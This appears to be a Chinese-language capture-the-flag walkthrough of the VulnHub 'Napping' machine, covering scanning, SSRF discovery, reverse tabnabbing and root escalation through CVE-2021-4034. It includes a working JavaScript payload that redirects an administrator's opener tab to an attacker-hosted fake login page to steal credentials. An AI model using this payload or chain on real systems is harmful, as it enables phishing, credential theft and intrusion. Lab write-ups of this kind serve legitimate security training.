Napping
?
攻擊機kali:192.168.0.105
靶機:192.168.0.103(使用virtualbox搭建)
下載地址:https://download.vulnhub.com/napping/napping-1.0.1.ova
一 · 靶機的發現與資訊搜集:
使用 networkdiscover 掃描當前網段,發現靶機ip為 192.168.0.103
networkdiscover -i eth0 -r 192.168.0.0/24
獲取ip地址后掃描當前靶機開放埠,發現僅開放 22、80埠
nmap -p1-65535 -sV -n -A 192.168.0.103
掃描當前站點web目錄,沒有找到特別的發現,開始在網站的功能點上尋找漏洞
[09:23:44] 200 - 0B - /config.php
[09:23:48] 200 - 1KB - /index.php
[09:23:48] 200 - 1KB - /index.php/login/
[09:23:50] 302 - 0B - /logout.php -> index.php
[09:23:55] 200 - 2KB - /register.php
[09:23:56] 403 - 278B - /server-status
訪問當前靶機80埠,注冊后發現站點是一個博客推廣網站,中間部分能填寫當前博客的網址,
還有一個重置密碼和一個登出的按鈕,咱留著后面再試
填寫鏈接后點擊按鈕會打開新標簽頁到填寫鏈接的地址,使用 dnslog 測驗后發現存在ssrf
二 · 漏洞發現
1 · 對管理員的釣魚
(1)查看頁面原始碼
描述中說到了,所有提交的鏈接都將由管理員審核,是否就意味著管理員會查看提交的 URL 所指向的內容,
查看頁面原始碼發現應存在一處 Tab Nabbing 漏洞,下面是一個網上找到的比較通俗易懂的解釋:https://kebingzao.com/2020/05/14/a-target-blank/
再來看靶機頁面的原始碼,target="_bank" 說明了此處確實是有可能存在這一個漏洞的,
(2)開始釣魚
? 使用wget 把登錄頁面的原始碼下載下來,然后再制作一個惡意鏈接,
wget http://192.168.0.103/index.php
? 我們將惡意的偽造頁面保存為 index.html ,將含有惡意 js 代碼的頁面保存為 evil.html
釣魚頁面原始碼:
<!DOCTYPE html>
<html>
<head>
<title>My Blog</title>
</head>
<body>
<script>
if(window.opener) window.opener.parent.location.replace('http://192.168.0.104/index.html');
if(window.opener != window) window.opener.parent.location.replace('http://192.168.0.104/index.html');
</script>
</body>
</html>
隨后將兩個頁面分別放進 /var/www/html 檔案夾下,并使用python3開啟 80 埠web服務
python3 -m http.server 80
將鏈接放在 blog link 框中后,在運行 web服務的主機上使用監聽程式監聽流量(這里打錯了,應該是 192.168.0.105)
?
成功使用 wireshark 看到魚兒上鉤了
?
三 · 獲取shell并提權
使用獲取的賬號密碼登錄 站點后臺,發現密碼錯誤,而后登錄 ssh 成功連接,
上傳提權輔助腳本,下載地址:https://github.com/mzet-/linux-exploit-suggester
成功使用 CVE-2021-4034 提權為root,并進入 root目錄
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/434406.html
標籤:其他
下一篇:面試官和應聘者的心理戰